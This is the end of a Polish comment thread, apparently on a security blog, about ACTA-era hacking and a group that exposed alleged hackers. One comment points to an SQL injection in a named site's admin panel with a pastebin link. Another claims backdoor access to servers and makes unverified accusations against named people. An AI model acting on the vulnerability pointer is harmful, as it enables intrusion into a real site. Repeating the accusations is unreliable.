  • szczerze mowiac nie wiadomo co jest prawda.. slowo przeciw slowu/ jesli ninjas mowia prawde to nalezaloby mimo wszystko potepic wyludzaczy. swoja droga to tez niepokojace.. ze takie ninjas sa zawse do przodu w porownaniu z prokuratura i sadami. zdobycie tych “dowodow” prawdopodobnie nie bylo do konca legalne, ztad moje watpliwosci. nie podobaloby mi sie ze ktos sledzi moja dzialalnosc w internecie poszukujac hakow. z drugiej strony swiadczy to o nieswiadomosci ludzi korzystajacych z internetu.
   wszystko to podsumowujac nasuwa mi wniosek.. ze najrozsadniej nie mieszac sie w sprawy internetu – tworu ktory juz dawno wytworzyl wlasne zachowania i standardy. uzytkownicy wykreowali internet w takiej postaci jak jest teraz. zmieniac te przyzwyczajenia to niebezpieczna sprawa. a wolnosc musi byc!!!!!!! STOP ACTA!!!!!!!
   STOP pseudo hakerom.

 65. chyba już załatali SQL injection w urbancard.pl/panel-admin/ http://pastebin.com/jF6t7J8F

 66. W polsce prawo nie wymaga podania hasła ? :”)

  • Nie masz takiego obowiązku.

 67. Mlodzi sie swietnie bawili, niczego powaznie zlego nie zrobili.
  Zycie na ziemi jest tylko jedno, zatem trzeba zrozumiec ze kazdy chce cos fajnego przezyc i odmienic ten swiat na lepszy.

  HappySnitches to poprostu pasożyty.

 68. 2000! wygrywam ipoda? ;>

 69. “koptok 2012.01.27 11:52 | # |
  Mielimy bajty, piszemy ‘splojty,
  Chcemy małej słusznej rewolty,
  Bandę złodzieji od A.C.T.A. wysadzić,
  Z foteli dupsk ich fetor rozsadzić,
  Przenieść na śmietnik historii.

  Wolności słowa dziś jest niewiele,
  A i tę oazę chcą zabrać trzmiele,
  Trutnie, łachmyty i komuniści,
  Niech jadą banany se zrywać kiści,
  Ja chce w Polsce być w piątek i w niedzielę.

  Ja chcę żyć w państiwe nie-policyjnym,
  Niech mi nie wchodzą wejściem tylnym,
  Anonimowi to jednak banda tchórzy,
  Jeden może mały, ale drugi duży,
  Z otwartą przyłbycą badź nieomylny,
  I powiedz:

  PRECZ Z A.C.T.A. !! !! !!”

  musze przyznac ze to dobry material na tekst z gatunku metalowej muzyki.. jesli autor ma chec to cos z wykopem moge do tego dokomponowac

  co do ninjas.. jesli prawde podaja ja osobiscie potepiam wszelkie udane badz nieudane proby zlodziejstwa. uwazam ze kazdy powinien z czystym sumieniem zarabiac na zycie. a podniemnianie kont zleksza buractwem traci i o kryminal sie ociera. jak sie nie umie zaroboc to trzeba ukrasc.

  pozdrowienia dla niebezpiecznika. przyznam ze przegladam od kilku dni zaledwie, ale popieram idee i staje sie powoli fanem.

  ps. nigdy do konca nie wiadomo co jest prawda. czegolnie w sieci latwo niektore informacje i dane podmienic.

 70. Wyżej przeczytałem, że ktoś pytał o to czy w Polsce prawo wymaga podania hasła a ktoś inny odpisał, że nie ma takiego obowiązku. To jest bardziej skomplikowane bo często organa ścigania stosują taki sprytny manewr służący do obejścia domniemania niewinności. Polega to na tym, że przesłuchiwany w charakterze świadka nie może odmówić zeznań. Może to zrobić tylko ktoś komu postawiono zarzuty i jest przesłuchiwany w charakterze podejrzanego. Z tego artykułu wynika: http://wroclaw.gazeta.pl/wroclaw/1,35751,11047076,.html że tak właśnie zrobili z tym “hakierem” z Wrocka ;)

 71. hapi nindża
  [img]http://i.wp.pl/a/f/jpeg/28060/tusk_biega_fakt2.jpeg[/img]

 72. Prawda jest taka że oboje korzystali z irssi, które zainstalowali na serwerze do którego uzyskali nieautoryzowany dostęp (dość dawno temu). Również te ‘ninja-noobs’ uzyskało tam dostęp (jakiś czas temu, mieli backdoora) a panowie zapomnieli w swoich katalogach home usunąć irc_logs/ no i mamy logi, które troche pozmieniali ponieważ fir3 co prawda razem z innymi uzyskał dostęp do premier.gov.pl, ale nie okradał sklepów internetowych. Co do narkotyków Pana Oskara tego nie wiemy (akurat). Rozumiemy obsmarować jakiegoś Niemca, lub kogoś innego no ale Polaka? Uważamy że cała ta akcja miała miejsce ponieważ ‘ninja-noobs’ miała dostęp do logów irc ów Panów. Pod ‘ninja-noobs’ kryje się użytkownik ‘[edited]’ czyli [dane osobowe usunięte na wniosek właściciela]. Pozdrawiamy, Skynet Crew :)

  • Dlaczego ocenzurowaliście dane Adam [dane osobowe, pseudonim i nazwisko, usunięte na wniosek właściciela]? Poskarżył się? LOL

 73. Jeśli ktoś chce pogadać na torchat to adres taki jak nick gmxtwsf73vevqazg

  Czy ktos zastanawiał się kim sa Anonimowi?

 74. […] przekonać się, czy jesteś jednym z “hackerów” DDoS-ujących ministerstwo, wejdź na stronę mkidn.gov.pl — jeśli zobaczysz to co poniżej, przykro nam — […]

 75. Elusiven masz pozdro od Karego ;)

 76. Teraz już hekko należy do cyberfolk i oni ogarniają ich serwery. Ogólnie cyberfolk już przejoł wiele różnych firm hostingowych i maja lepsze zaplecze serwisowe. Ale niestety są drodzy.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: